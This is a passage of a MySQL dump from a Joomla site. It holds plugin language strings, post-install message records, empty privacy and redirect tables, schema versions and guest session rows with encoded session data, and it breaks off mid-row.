Library','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.sys.ini'),(5187,'PLG_SYSTEM_SNIPPETS','System - Regular Labs - Snippets','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5188,'PLG_SYSTEM_SNIPPETS_DESC','Snippets - content placeholders in Joomla!','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5189,'SNIPPETS','Snippets','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5190,'SNIPPETS_DESC','With Snippets you can include text snippets in your content.','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5191,'SNP_EXTENSION_CAN_NOT_FUNCTION','[[%1:extension name%]] cannot function.','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5192,'SNP_REGULAR_LABS_LIBRARY_NOT_ENABLED','Regular Labs Library plugin is not enabled.','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5193,'SNP_REGULAR_LABS_LIBRARY_NOT_INSTALLED','Regular Labs Library plugin is not installed.','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5194,'SNP_REGULAR_LABS_LIBRARY_OUTDATED','Regular Labs Library plugin is outdated. Try to re-install [[%1:extension name%]].','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5195,'SNP_OUTPUT_REMOVED_NOT_ENABLED','The snippet cannot be placed because it is not enabled.','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5196,'SNP_OUTPUT_REMOVED_NOT_FOUND','The snippet cannot be placed because it does not exist.','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5197,'SNP_SETTINGS','Please see the [[%1:start link%]]Snippets component[[%2:end link%]] for settings.','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5198,'SNP_THE_COMPONENT','the Snippets component','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.ini'),(5199,'PLG_SYSTEM_SNIPPETS','System - Regular Labs - Snippets','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.sys.ini'),(5200,'PLG_SYSTEM_SNIPPETS_DESC','Snippets - content placeholders in Joomla!','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.sys.ini'),(5201,'SNIPPETS','Snippets','/home/smthsmth/public_html/plugins/system/snippets/language/en-GB/en-GB.plg_system_snippets.sys.ini');
/*!40000 ALTER TABLE `vzx9b_overrider` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_postinstall_messages`
--
DROP TABLE IF EXISTS `vzx9b_postinstall_messages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_postinstall_messages` (
`postinstall_message_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`extension_id` bigint(20) NOT NULL DEFAULT 700 COMMENT 'FK to #__extensions',
`title_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for the title',
`description_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for description',
`action_key` varchar(255) NOT NULL DEFAULT '',
`language_extension` varchar(255) NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys',
`language_client_id` tinyint(3) NOT NULL DEFAULT 1,
`type` varchar(10) NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action',
`action_file` varchar(255) DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method',
`action` varchar(255) DEFAULT '' COMMENT 'Action method name or URL',
`condition_file` varchar(255) DEFAULT NULL COMMENT 'RAD URI to file holding display condition method',
`condition_method` varchar(255) DEFAULT NULL COMMENT 'Display condition method, must return boolean',
`version_introduced` varchar(50) NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced',
`enabled` tinyint(3) NOT NULL DEFAULT 1,
PRIMARY KEY (`postinstall_message_id`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_postinstall_messages`
--
LOCK TABLES `vzx9b_postinstall_messages` WRITE;
/*!40000 ALTER TABLE `vzx9b_postinstall_messages` DISABLE KEYS */;
INSERT INTO `vzx9b_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',0),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(3,700,'COM_CPANEL_WELCOME_BEGINNERS_TITLE','COM_CPANEL_WELCOME_BEGINNERS_MESSAGE','','com_cpanel',1,'message','','','','','3.2.0',0),(5,700,'COM_CPANEL_MSG_HTACCESS_TITLE','COM_CPANEL_MSG_HTACCESS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/htaccess.php','admin_postinstall_htaccess_condition','3.4.0',0),(6,700,'COM_CPANEL_MSG_ROBOTS_TITLE','COM_CPANEL_MSG_ROBOTS_BODY','','com_cpanel',1,'message','','','','','3.3.0',0),(7,700,'COM_CPANEL_MSG_LANGUAGEACCESS340_TITLE','COM_CPANEL_MSG_LANGUAGEACCESS340_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/languageaccess340.php','admin_postinstall_languageaccess340_condition','3.4.1',1),(8,700,'COM_CPANEL_MSG_STATS_COLLECTION_TITLE','COM_CPANEL_MSG_STATS_COLLECTION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/statscollection.php','admin_postinstall_statscollection_condition','3.5.0',0),(9,700,'PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME','PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_BODY','PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_ACTION','plg_system_updatenotification',1,'action','site://plugins/system/updatenotification/postinstall/updatecachetime.php','updatecachetime_postinstall_action','site://plugins/system/updatenotification/postinstall/updatecachetime.php','updatecachetime_postinstall_condition','3.6.3',1),(10,700,'COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_TITLE','COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/joomla40checks.php','admin_postinstall_joomla40checks_condition','3.7.0',1),(11,700,'TPL_HATHOR_MESSAGE_POSTINSTALL_TITLE','TPL_HATHOR_MESSAGE_POSTINSTALL_BODY','TPL_HATHOR_MESSAGE_POSTINSTALL_ACTION','tpl_hathor',1,'action','admin://templates/hathor/postinstall/hathormessage.php','hathormessage_postinstall_action','admin://templates/hathor/postinstall/hathormessage.php','hathormessage_postinstall_condition','3.7.0',1),(12,700,'PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_TITLE','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_BODY','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_ACTION','plg_captcha_recaptcha',1,'action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_condition','3.8.6',1),(13,700,'COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_TITLE','COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/updatedefaultsettings.php','admin_postinstall_updatedefaultsettings_condition','3.8.8',1),(14,700,'COM_ACTIONLOGS_POSTINSTALL_TITLE','COM_ACTIONLOGS_POSTINSTALL_BODY','','com_actionlogs',1,'message','','','','','3.9.0',1),(15,700,'COM_PRIVACY_POSTINSTALL_TITLE','COM_PRIVACY_POSTINSTALL_BODY','','com_privacy',1,'message','','','','','3.9.0',1),(16,700,'COM_CPANEL_MSG_ADDNOSNIFF_TITLE','COM_CPANEL_MSG_ADDNOSNIFF_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/addnosniff.php','admin_postinstall_addnosniff_condition','3.9.3',1),(17,700,'COM_CPANEL_MSG_TEXTFILTER3919_TITLE','COM_CPANEL_MSG_TEXTFILTER3919_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/textfilter3919.php','admin_postinstall_textfilter3919_condition','3.9.19',1),(18,700,'COM_CPANEL_MSG_HTACCESSSVG_TITLE','COM_CPANEL_MSG_HTACCESSSVG_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/htaccesssvg.php','admin_postinstall_htaccesssvg_condition','3.9.21',1),(19,700,'COM_ADMIN_POSTINSTALL_MSG_HTACCESS_AUTOINDEX_TITLE','COM_ADMIN_POSTINSTALL_MSG_HTACCESS_AUTOINDEX_DESCRIPTION','','com_admin',1,'message','','',NULL,NULL,'3.9.22',1);
/*!40000 ALTER TABLE `vzx9b_postinstall_messages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_privacy_consents`
--
DROP TABLE IF EXISTS `vzx9b_privacy_consents`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_privacy_consents` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` int(10) unsigned NOT NULL DEFAULT 0,
`state` int(10) NOT NULL DEFAULT 1,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`subject` varchar(255) NOT NULL DEFAULT '',
`body` text NOT NULL,
`remind` tinyint(4) NOT NULL DEFAULT 0,
`token` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
KEY `idx_user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_privacy_consents`
--
LOCK TABLES `vzx9b_privacy_consents` WRITE;
/*!40000 ALTER TABLE `vzx9b_privacy_consents` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_privacy_consents` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_privacy_requests`
--
DROP TABLE IF EXISTS `vzx9b_privacy_requests`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_privacy_requests` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`email` varchar(100) NOT NULL DEFAULT '',
`requested_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`status` tinyint(4) NOT NULL DEFAULT 0,
`request_type` varchar(25) NOT NULL DEFAULT '',
`confirm_token` varchar(100) NOT NULL DEFAULT '',
`confirm_token_created_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_privacy_requests`
--
LOCK TABLES `vzx9b_privacy_requests` WRITE;
/*!40000 ALTER TABLE `vzx9b_privacy_requests` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_privacy_requests` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_redirect_links`
--
DROP TABLE IF EXISTS `vzx9b_redirect_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_redirect_links` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`old_url` varchar(2048) NOT NULL,
`new_url` varchar(2048) DEFAULT NULL,
`referer` varchar(2048) NOT NULL,
`comment` varchar(255) NOT NULL DEFAULT '',
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`published` tinyint(4) NOT NULL,
`created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`header` smallint(3) NOT NULL DEFAULT 301,
PRIMARY KEY (`id`),
KEY `idx_old_url` (`old_url`(100)),
KEY `idx_link_modifed` (`modified_date`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_redirect_links`
--
LOCK TABLES `vzx9b_redirect_links` WRITE;
/*!40000 ALTER TABLE `vzx9b_redirect_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_redirect_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_schemas`
--
DROP TABLE IF EXISTS `vzx9b_schemas`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_schemas` (
`extension_id` int(11) NOT NULL,
`version_id` varchar(20) NOT NULL,
PRIMARY KEY (`extension_id`,`version_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_schemas`
--
LOCK TABLES `vzx9b_schemas` WRITE;
/*!40000 ALTER TABLE `vzx9b_schemas` DISABLE KEYS */;
INSERT INTO `vzx9b_schemas` VALUES (700,'3.9.22-2020-09-16'),(10004,'3.7.1-2020-02-20'),(10038,'4.0');
/*!40000 ALTER TABLE `vzx9b_schemas` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_session`
--
DROP TABLE IF EXISTS `vzx9b_session`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_session` (
`session_id` varbinary(192) NOT NULL,
`client_id` tinyint(3) unsigned DEFAULT NULL,
`guest` tinyint(3) unsigned DEFAULT 1,
`time` int(11) NOT NULL DEFAULT 0,
`data` mediumtext DEFAULT NULL,
`userid` int(11) DEFAULT 0,
`username` varchar(150) DEFAULT '',
PRIMARY KEY (`session_id`),
KEY `userid` (`userid`),
KEY `time` (`time`),
KEY `client_id_guest` (`client_id`,`guest`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_session`
--
LOCK TABLES `vzx9b_session` WRITE;
/*!40000 ALTER TABLE `vzx9b_session` DISABLE KEYS */;
INSERT INTO `vzx9b_session` VALUES ('0abdn5jttcq130h5v0olfh6nff',0,1,1668301821,'joomla|s:736:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODMwMTgyMDtzOjQ6Imxhc3QiO2k6MTY2ODMwMTgyMDtzOjM6Im5vdyI7aToxNjY4MzAxODIwO31zOjU6InRva2VuIjtzOjMyOiI3ZHlFZWp3VVZUdW1ENlRKTnNlbThLSDZ4ekVXZE01cSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('0lke7c757n19ela0q44a1rdp3f',0,1,1668973316,'joomla|s:736:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODk3MzMxNjtzOjQ6Imxhc3QiO2k6MTY2ODk3MzMxNjtzOjM6Im5vdyI7aToxNjY4OTczMzE2O31zOjU6InRva2VuIjtzOjMyOiIxVDRSejI5QmZNNldwZjVhTmdFbkp4YmFiZGhKeHpqbCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('0n53pcrugupvka932728a3tokq',0,1,1668973258,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODk3MzI1MztzOjQ6Imxhc3QiO2k6MTY2ODk3MzI1MztzOjM6Im5vdyI7aToxNjY4OTczMjUzO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('0tc4v2mnfj1vq3sc9j38a80g14',0,1,1668301496,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODMwMTQ5NjtzOjQ6Imxhc3QiO2k6MTY2ODMwMTQ5NjtzOjM6Im5vdyI7aToxNjY4MzAxNDk2O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('2dghu37uae1gah8584j59e449i',0,1,1668652593,'joomla|s:860:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODY1MjU4MTtzOjQ6Imxhc3QiO2k6MTY2ODY1MjU4MTtzOjM6Im5vdyI7aToxNjY4NjUyNTkwO31zOjU6InRva2VuIjtzOjMyOiJCS1FjSWNvRm0xZzZzN2d5R0dJMFpNelg3M1UyTkNMZyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjEzOiJjb21faW5zdGFsbGVyIjtPOjg6InN0ZENsYXNzIjoyOntzOjc6Im1lc3NhZ2UiO3M6MDoiIjtzOjE3OiJleHRlbnNpb25fbWVzc2FnZSI7czowOiIiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('2lh6p9jo1udej7lv86n16q5dm5',0,1,1668973262,'joomla|s:860:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODk3MzI1OTtzOjQ6Imxhc3QiO2k6MTY2ODk3MzI1OTtzOjM6Im5vdyI7aToxNjY4OTczMjU5O31zOjU6InRva2VuIjtzOjMyOiJvdkNIeDY2ZTUzSDhqa0VEeVBsMUJ5UjBqOXk5SEIwVCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjEzOiJjb21faW5zdGFsbGVyIjtPOjg6InN0ZENsYXNzIjoyOntzOjc6Im1lc3NhZ2UiO3M6MDoiIjtzOjE3OiJleHRlbnNpb25fbWVzc2FnZSI7czowOiIiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('4ejt4riu66m48vrembbecspiqa',0,1,1668566234,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODU2NjIzMjtzOjQ6Imxhc3QiO2k6MTY2ODU2NjIzMjtzOjM6Im5vdyI7aToxNjY4NTY2MjMyO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('5ja5a9l721b2a4fp5brn47po00',0,1,1668066368,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODA2NjM2NztzOjQ6Imxhc3QiO2k6MTY2ODA2NjM2NztzOjM6Im5vdyI7aToxNjY4MDY2MzY3O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('6mm7fns2obnvu5hkh1fribf0fb',0,1,1668670566,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODY3MDU2NTtzOjQ6Imxhc3QiO2k6MTY2ODY3MDU2NTtzOjM6Im5vdyI7aToxNjY4NjcwNTY1O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('84r59pb3a3elht39qk0f3s82p9',0,1,1668301591,'joomla|s:736:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODMwMTU5MDtzOjQ6Imxhc3QiO2k6MTY2ODMwMTU5MDtzOjM6Im5vdyI7aToxNjY4MzAxNTkwO31zOjU6InRva2VuIjtzOjMyOiJuQzQ3aUQ5TWpZQVlqcGUxbWNuWFNaVlVnTDhQMVk1QyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXR